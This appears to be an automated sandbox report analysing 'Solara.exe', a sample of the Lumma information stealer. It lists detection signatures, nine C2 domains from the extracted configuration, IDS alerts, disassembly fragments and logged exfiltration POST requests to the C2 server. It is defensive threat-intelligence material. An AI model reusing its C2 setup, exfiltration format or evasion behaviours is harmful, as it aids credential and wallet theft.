Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Solara.exe

Overview

General Information

Sample name:Solara.exe
Analysis ID:1581432
MD5:a58debbc1c1961456ca288898e937ffb
SHA1:018e99304ae7b0d1fbae772daab0acd5afb5f3c6
SHA256:08d7909a9758d3c8e1492e5f83721acb930300d182ec2877dbe59bddd251e602
Tags:exeuser-JaffaCakes118
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to modify clipboard data
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Solara.exe (PID: 7556 cmdline: "C:\Users\user\Desktop\Solara.exe" MD5: A58DEBBC1C1961456CA288898E937FFB)
    • conhost.exe (PID: 7564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Solara.exe (PID: 7620 cmdline: "C:\Users\user\Desktop\Solara.exe" MD5: A58DEBBC1C1961456CA288898E937FFB)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["prisonyfork.buzz", "hummskitnj.buzz", "cashfuzysao.buzz", "mindhandru.buzz", "scentniej.buzz", "inherineau.buzz", "screwamusresz.buzz", "rebuildeso.buzz", "appliacnesot.buzz"], "Build id": "yau6Na--629912535"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000002.00000003.1768091011.0000000002D70000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: Solara.exe PID: 7620JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
          Process Memory Space: Solara.exe PID: 7620JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Process Memory Space: Solara.exe PID: 7620JoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
              Process Memory Space: Solara.exe PID: 7620JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
                Click to see the 1 entries
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T16:20:58.059815+010020283713Unknown Traffic192.168.2.449733172.67.165.185443TCP
                2024-12-27T16:21:00.150427+010020283713Unknown Traffic192.168.2.449734172.67.165.185443TCP
                2024-12-27T16:21:02.536177+010020283713Unknown Traffic192.168.2.449735172.67.165.185443TCP
                2024-12-27T16:21:04.940094+010020283713Unknown Traffic192.168.2.449736172.67.165.185443TCP
                2024-12-27T16:21:07.237305+010020283713Unknown Traffic192.168.2.449737172.67.165.185443TCP
                2024-12-27T16:21:09.801267+010020283713Unknown Traffic192.168.2.449738172.67.165.185443TCP
                2024-12-27T16:21:12.337000+010020283713Unknown Traffic192.168.2.449739172.67.165.185443TCP
                2024-12-27T16:21:16.149908+010020283713Unknown Traffic192.168.2.449741172.67.165.185443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T16:20:58.825403+010020546531A Network Trojan was detected192.168.2.449733172.67.165.185443TCP
                2024-12-27T16:21:00.929153+010020546531A Network Trojan was detected192.168.2.449734172.67.165.185443TCP
                2024-12-27T16:21:16.932910+010020546531A Network Trojan was detected192.168.2.449741172.67.165.185443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T16:20:58.825403+010020498361A Network Trojan was detected192.168.2.449733172.67.165.185443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T16:21:00.929153+010020498121A Network Trojan was detected192.168.2.449734172.67.165.185443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T16:21:12.351028+010020480941Malware Command and Control Activity Detected192.168.2.449739172.67.165.185443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: https://mindhandru.buzz:443/apiE_Avira URL Cloud: Label: malware
                Source: https://mindhandru.buzz/apiza2Avira URL Cloud: Label: malware
                Source: https://mindhandru.buzz/api0u0uAvira URL Cloud: Label: malware
                Source: https://mindhandru.buzz/ZAvira URL Cloud: Label: malware
                Source: https://mindhandru.buzz/apiB&Avira URL Cloud: Label: malware
                Source: https://mindhandru.buzz:443/apiRdAvira URL Cloud: Label: malware
                Source: https://mindhandru.buzz/sAvira URL Cloud: Label: malware
                Source: https://mindhandru.buzz/ndowsAvira URL Cloud: Label: malware
                Source: https://mindhandru.buzz/DAvira URL Cloud: Label: malware
                Source: 00000000.00000002.1647778505.0000000005148000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["prisonyfork.buzz", "hummskitnj.buzz", "cashfuzysao.buzz", "mindhandru.buzz", "scentniej.buzz", "inherineau.buzz", "screwamusresz.buzz", "rebuildeso.buzz", "appliacnesot.buzz"], "Build id": "yau6Na--629912535"}
                Source: Solara.exeJoe Sandbox ML: detected
                Source: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: hummskitnj.buzz
                Source: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: cashfuzysao.buzz
                Source: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: appliacnesot.buzz
                Source: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: screwamusresz.buzz
                Source: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: inherineau.buzz
                Source: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: scentniej.buzz
                Source: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: rebuildeso.buzz
                Source: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: prisonyfork.buzz
                Source: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: mindhandru.buzz
                Source: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                Source: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
                Source: 00000002.00000002.2897830622.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: yau6Na--629912535
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_004150E9 CryptUnprotectData,2_2_004150E9
                Source: Solara.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.4:49733 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.4:49734 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.4:49735 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.4:49736 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.4:49737 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.4:49738 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.4:49739 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.4:49741 version: TLS 1.2
                Source: C:\Users\user\Desktop\Solara.exeCode function: 0_2_00221FE9 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00221FE9
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then movzx ebx, byte ptr [esp+edx+78D47264h]2_2_0040C06F
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then movzx ebx, byte ptr [esp+edx+78D47264h]2_2_0040C06F
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then mov ecx, eax2_2_004150E9
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then mov ecx, eax2_2_0043D0BC
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then movzx ecx, byte ptr [ebx+eax]2_2_0042B73E
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then mov byte ptr [edi], al2_2_0042B73E
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then movzx edx, byte ptr [ecx+edi+64F798A8h]2_2_0042B73E
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then mov esi, ecx2_2_0042187F
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then mov ecx, eax2_2_0042187F
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then lea edx, dword ptr [esp+0Dh]2_2_0042187F
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h2_2_0043EBB0
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then movzx eax, di2_2_00425CD0
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then mov ecx, eax2_2_00425CD0
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx-490B343Ah]2_2_00437D90
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then cmp byte ptr [eax+edi+09h], 00000000h2_2_00437D90
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then movzx ebx, byte ptr [eax+edx]2_2_0043C010
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then movzx ebp, byte ptr [esp+ecx]2_2_004250C0
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then xor byte ptr [esp+ecx+68h], cl2_2_0041608C
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+38h]2_2_00426150
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-24036751h]2_2_00426170
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then mov byte ptr [edx], al2_2_00426170
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+00000082h]2_2_00423180
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then movzx ebp, word ptr [eax]2_2_0043F220
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then mov byte ptr [edi], cl2_2_0042D2B4
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then mov byte ptr [edi], cl2_2_0042D2B4
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]2_2_0042A360
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then movzx eax, byte ptr [esp+ecx+0309C065h]2_2_0040C30B
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then mov eax, dword ptr [00444D38h]2_2_0040D3C3
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]2_2_00407430
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]2_2_00407430
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then mov byte ptr [ecx], dl2_2_00417494
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then movzx ecx, byte ptr [ebp+eax-1Ch]2_2_0043849F
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 3D17632Eh2_2_0043B4B0
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then mov ecx, dword ptr [edi+eax]2_2_004274B5
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then movzx edx, byte ptr [ebx+eax-000000E7h]2_2_0043C559
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx]2_2_0041457C
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+00000082h]2_2_00423520
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+12h]2_2_00409650
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then movzx ebx, bx2_2_00423650
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-07FC5FBDh]2_2_0040C6F5
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then mov dword ptr [esi+14h], eax2_2_00429680
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+00000082h]2_2_00423680
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+3Ch]2_2_0041A722
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then test eax, eax2_2_00438730
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then movzx ebx, byte ptr [edx]2_2_004357C0
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh2_2_0043B780
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then jmp eax2_2_00424789
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then mov ecx, ebx2_2_00424789
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then mov ecx, edx2_2_0040A840
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then movzx ebx, byte ptr [eax+edx]2_2_0041D860
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]2_2_00429810
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then mov ebx, eax2_2_004058E0
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then mov ebp, eax2_2_004058E0
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then cmp word ptr [edi+edx+02h], 0000h2_2_0041B8F0
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then mov eax, dword ptr [esp+40h]2_2_004298B0
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then mov byte ptr [edi], cl2_2_0042CA59
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then mov ecx, eax2_2_00428B40
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+000000B4h]2_2_00418BC2
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then movzx ecx, byte ptr [ebx+eax]2_2_0042BC22
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then mov byte ptr [edi], al2_2_0042BC22
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then movzx edx, byte ptr [ecx+edi+64F798A8h]2_2_0042BC22
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then mov word ptr [ecx], bx2_2_0041BCCE
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-491290D7h]2_2_0041BCCE
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then mov edi, eax2_2_0040ACD0
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then movzx edx, byte ptr [edi+ecx-7E3BC487h]2_2_00427CDD
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then mov word ptr [ecx], bx2_2_0041BCBB
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-491290D7h]2_2_0041BCBB
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then movzx edx, byte ptr [eax]2_2_00414D0A
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then mov byte ptr [ebx], al2_2_0041CE00
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then cmp byte ptr [esi+eax], 00000000h2_2_00429E00
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then mov ecx, eax2_2_00413EB0
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then cmp dword ptr [ecx+edi*8], 2DFE5A91h2_2_0043EF50
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then mov edi, eax2_2_00408FF0
                Source: C:\Users\user\Desktop\Solara.exeCode function: 4x nop then mov byte ptr [edi], cl2_2_00408FF0

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49734 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49733 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49734 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49733 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49741 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49739 -> 172.67.165.185:443
                Source: Malware configuration extractorURLs: prisonyfork.buzz
                Source: Malware configuration extractorURLs: hummskitnj.buzz
                Source: Malware configuration extractorURLs: cashfuzysao.buzz
                Source: Malware configuration extractorURLs: mindhandru.buzz
                Source: Malware configuration extractorURLs: scentniej.buzz
                Source: Malware configuration extractorURLs: inherineau.buzz
                Source: Malware configuration extractorURLs: screwamusresz.buzz
                Source: Malware configuration extractorURLs: rebuildeso.buzz
                Source: Malware configuration extractorURLs: appliacnesot.buzz
                Source: Joe Sandbox ViewIP Address: 172.67.165.185 172.67.165.185
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 172.67.165.185:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 172.67.165.185:443
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: mindhandru.buzz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 51Host: mindhandru.buzz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=DUA4BN7M2HKUX0SZMMZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18173Host: mindhandru.buzz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=QBD10WBWROF7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8752Host: mindhandru.buzz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=4V5NXPZBSP7Q7O7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20423Host: mindhandru.buzz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=826W8W5G6DWUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1228Host: mindhandru.buzz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=IWMGITR0XK6E94L5XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 570559Host: mindhandru.buzz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 86Host: mindhandru.buzz
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficDNS traffic detected: DNS query: mindhandru.buzz
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: mindhandru.buzz
                Source: Solara.exeString found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
                Source: Solara.exe, 00000002.00000003.1741428959.00000000054E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: Solara.exe, 00000002.00000003.1741428959.00000000054E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: Solara.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                Source: Solara.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                Source: Solara.exeString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                Source: Solara.exeString found in binary or memory: http://crl.entrust.net/ts1ca.crl0
                Source: Solara.exe, 00000002.00000003.1792136717.0000000002D70000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.1806487513.0000000002D70000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.1831530096.0000000002D70000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.1831693349.0000000002DB7000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.1694562958.0000000002D70000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.1768091011.0000000002D70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                Source: Solara.exe, 00000002.00000003.1741428959.00000000054E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: Solara.exe, 00000002.00000003.1741428959.00000000054E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: Solara.exe, 00000002.00000003.1741428959.00000000054E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: Solara.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                Source: Solara.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                Source: Solara.exe, 00000002.00000003.1741428959.00000000054E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: Solara.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                Source: Solara.exe, 00000002.00000003.1741428959.00000000054E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: Solara.exeString found in binary or memory: http://ocsp.digicert.com0
                Source: Solara.exeString found in binary or memory: http://ocsp.digicert.com0A
                Source: Solara.exeString found in binary or memory: http://ocsp.entrust.net02
                Source: Solara.exeString found in binary or memory: http://ocsp.entrust.net03
                Source: Solara.exe, 00000002.00000003.1741428959.00000000054E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: Solara.exeString found in binary or memory: http://www.digicert.com/CPS0
                Source: Solara.exeString found in binary or memory: http://www.entrust.net/rpa03
                Source: Solara.exe, 00000002.00000003.1741428959.00000000054E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: Solara.exe, 00000002.00000003.1741428959.00000000054E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: Solara.exe, 00000002.00000003.1695230625.0000000005508000.00000004.00000800.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.1695152176.000000000550B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: Solara.exe, 00000002.00000003.1742691939.00000000054CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
